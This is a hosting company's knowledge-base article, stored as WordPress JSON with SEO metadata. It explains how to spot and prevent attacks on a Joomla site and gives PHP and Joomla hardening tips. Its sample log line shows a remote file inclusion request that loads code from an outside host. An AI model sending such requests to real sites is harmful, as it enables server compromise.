{"id":1435,"date":"2011-01-03T10:56:08","date_gmt":"2011-01-03T10:56:08","guid":{"rendered":"http:\/\/www.bodhost.com\/web-hosting\/?p=1435"},"modified":"2026-02-26T14:04:36","modified_gmt":"2026-02-26T14:04:36","slug":"what-to-do-when-joomla-is-hacked","status":"publish","type":"post","link":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/","title":{"rendered":"What to do when Joomla is hacked?"},"content":{"rendered":"

When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs. You might discover suspicious client requests there for eg:<\/p>\n

192.168.0.1 – – [29\/Oct\/2008:06:07:30 -0500] “GET \/index.php?live_site=domain.com\/1.txt?? HTTP\/1.1” 200 10864 “-” “Firefox”<\/p>\n

But there are times when its extremely difficult to trace and decode an attack on your website. It might take the skills and time of an expert developer to successfully trace an attack. Hopefully the below points might prove helpful to prevent any attacks on your Joomla website<\/p>\n

    \n
  1. Check if the Joomla core is updated with the latest version. Older versions are more susceptible to attacks and hacks. To check this, you will have to log into your Joomla admin where the version is clearly specified.<\/li>\n
  2. Outdated Joomla Add ons\/ modules With the core, also check for any additional modules. If you have \u00a0any outdated versions of modules that can create problems with security. You have to keep them updated always. You can easily check on upgrades, security issues on the modules official websites.<\/li>\n
  3. Security breaches through misconfigurations:In PHP configuration: check ‘register_globals’ if this is ‘on’ this directive can cause variable poisoning;
    \nSwitch this ‘off’<\/p>\n

    PHP configuration: check ‘- allow_url_include’. If this directive is ‘on’, \u00a0it is easy to add remote code to your Joomla script. Turn this off too.<\/p>\n

    using the default table prefix _jos. This allows MySQL injections. You have to make changes so that your table prefix cannot easily decoded through this component.<\/li>\n<\/ol>\n

    RG_EMULATION turned on in Joomla 1.0.* – this directive emulates register_globals locally. This directive should be disabled. When enabled a warning will be displayed right after you log in to your Joomla admin panel. To disable it, you can add the following somewhere in the middle of the configuration.php file:
    \nif(!defined(‘RG_EMULATION’)) { define( ‘RG_EMULATION’, 0 ); }<\/p>\n","protected":false},"excerpt":{"rendered":"

    When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs. You might discover suspicious client requests there for eg: 192.168.0.1 – – [29\/Oct\/2008:06:07:30 -0500]…<\/p>\n

    Read More<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[665,297],"tags":[],"class_list":["post-1435","post","type-post","status-publish","format-standard","hentry","category-content-management-systems","category-faq"],"yoast_head":"\nWhat to do when Joomla is hacked?<\/title>\n<meta name=\"description\" content=\"When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"What to do when Joomla is hacked?\" \/>\n<meta property=\"og:description\" content=\"When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/\" \/>\n<meta property=\"og:site_name\" content=\"Knowledge Base - bodHOST\" \/>\n<meta property=\"article:published_time\" content=\"2011-01-03T10:56:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-26T14:04:36+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#\\\/schema\\\/person\\\/c48414ad1536cea20e85282b0737a9f9\"},\"headline\":\"What to do when Joomla is hacked?\",\"datePublished\":\"2011-01-03T10:56:08+00:00\",\"dateModified\":\"2026-02-26T14:04:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/\"},\"wordCount\":316,\"publisher\":{\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#organization\"},\"articleSection\":[\"Content Management Systems\",\"FAQs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/\",\"url\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/\",\"name\":\"What to do when Joomla is hacked?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#website\"},\"datePublished\":\"2011-01-03T10:56:08+00:00\",\"dateModified\":\"2026-02-26T14:04:36+00:00\",\"description\":\"When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/what-to-do-when-joomla-is-hacked\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Content Management Systems\",\"item\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/category\\\/content-management-systems\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"What to do when Joomla is hacked?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#website\",\"url\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/\",\"name\":\"Web Hosting Knowledge Base | bodHOST Hosting FAQ\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#organization\"},\"alternateName\":\"Web Hosting Knowledge Base | bodHOST Hosting FAQ\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#organization\",\"name\":\"Web Hosting Knowledge Base | bodHOST Hosting FAQ\",\"url\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/Profile-Pic.png\",\"contentUrl\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/Profile-Pic.png\",\"width\":240,\"height\":240,\"caption\":\"Web Hosting Knowledge Base | bodHOST Hosting FAQ\"},\"image\":{\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/#\\\/schema\\\/person\\\/c48414ad1536cea20e85282b0737a9f9\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/51e53199212db3f59606920448d45a6ead224f904558e3ab9251d071a609b202?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/51e53199212db3f59606920448d45a6ead224f904558e3ab9251d071a609b202?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/51e53199212db3f59606920448d45a6ead224f904558e3ab9251d071a609b202?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.bodhost.com\\\/kb\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"What to do when Joomla is hacked?","description":"When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/","og_locale":"en_US","og_type":"article","og_title":"What to do when Joomla is hacked?","og_description":"When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs","og_url":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/","og_site_name":"Knowledge Base - bodHOST","article_published_time":"2011-01-03T10:56:08+00:00","article_modified_time":"2026-02-26T14:04:36+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/#article","isPartOf":{"@id":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/"},"author":{"name":"admin","@id":"https:\/\/www.bodhost.com\/kb\/#\/schema\/person\/c48414ad1536cea20e85282b0737a9f9"},"headline":"What to do when Joomla is hacked?","datePublished":"2011-01-03T10:56:08+00:00","dateModified":"2026-02-26T14:04:36+00:00","mainEntityOfPage":{"@id":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/"},"wordCount":316,"publisher":{"@id":"https:\/\/www.bodhost.com\/kb\/#organization"},"articleSection":["Content Management Systems","FAQs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/","url":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/","name":"What to do when Joomla is hacked?","isPartOf":{"@id":"https:\/\/www.bodhost.com\/kb\/#website"},"datePublished":"2011-01-03T10:56:08+00:00","dateModified":"2026-02-26T14:04:36+00:00","description":"When you discover that your Joomla is under attack, you should first go through the \u00a0weblogs","breadcrumb":{"@id":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.bodhost.com\/kb\/what-to-do-when-joomla-is-hacked\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Content Management Systems","item":"https:\/\/www.bodhost.com\/kb\/category\/content-management-systems\/"},{"@type":"ListItem","position":2,"name":"What to do when Joomla is hacked?"}]},{"@type":"WebSite","@id":"https:\/\/www.bodhost.com\/kb\/#website","url":"https:\/\/www.bodhost.com\/kb\/","name":"Web Hosting Knowledge Base | bodHOST Hosting FAQ","description":"","publisher":{"@id":"https:\/\/www.bodhost.com\/kb\/#organization"},"alternateName":"Web Hosting Knowledge Base | bodHOST Hosting FAQ","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.bodhost.com\/kb\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.bodhost.com\/kb\/#organization","name":"Web Hosting Knowledge Base | bodHOST Hosting FAQ","url":"https:\/\/www.bodhost.com\/kb\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.bodhost.com\/kb\/#\/schema\/logo\/image\/","url":"https:\/\/www.bodhost.com\/kb\/wp-content\/uploads\/2025\/10\/Profile-Pic.png","contentUrl":"https:\/\/www.bodhost.com\/kb\/wp-content\/uploads\/2025\/10\/Profile-Pic.png","width":240,"height":240,"caption":"Web Hosting Knowledge Base | bodHOST Hosting FAQ"},"image":{"@id":"https:\/\/www.bodhost.com\/kb\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.bodhost.com\/kb\/#\/schema\/person\/c48414ad1536cea20e85282b0737a9f9","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/51e53199212db3f59606920448d45a6ead224f904558e3ab9251d071a609b202?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/51e53199212db3f59606920448d45a6ead224f904558e3ab9251d071a609b202?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/51e53199212db3f59606920448d45a6ead224f904558e3ab9251d071a609b202?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.bodhost.com\/kb\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/posts\/1435","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/comments?post=1435"}],"version-history":[{"count":5,"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/posts\/1435\/revisions"}],"predecessor-version":[{"id":12423,"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/posts\/1435\/revisions\/12423"}],"wp:attachment":[{"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/media?parent=1435"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/categories?post=1435"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.bodhost.com\/kb\/wp-json\/wp\/v2\/tags?post=1435"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}